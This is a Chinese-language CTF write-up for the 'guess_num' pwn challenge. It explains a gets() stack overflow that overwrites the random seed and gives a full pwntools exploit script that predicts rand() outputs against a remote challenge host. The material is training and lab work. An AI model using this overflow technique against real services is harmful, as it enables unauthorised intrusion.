guess_num

检查保护，64位程序保护全开

查看主函数，大致是对随机数进行一个check，但是seed未知。在gets处存在栈溢出，栈空间分布如下

因此我们可以通过gets修改seed的值，从而通过已知的seed进行随机数的check

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from MyPwn import*
from ctypes import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='61.147.171.105'
port=50603
file_name='guess_num'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1
    libc_rand = CDLL("libc.so.6")
    libc_rand.srand(1)
    payload=b'a'*(0x30-0x10)+p64(0)
    io.sendlineafter(b'name:',payload)

    for i in range(10):
        v6 = libc_rand.rand() % 6 + 1
        print(f'Round{i}:{v6}')
        io.sendlineafter(b'number:',str(v6).encode())

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()

和ez_game不同的是，这道题的seed是未知的，所以需要使用gets栈溢出修改seed的值。同样的这里将seed的值修改为0后，将libc.srand设置成0和1是等价的。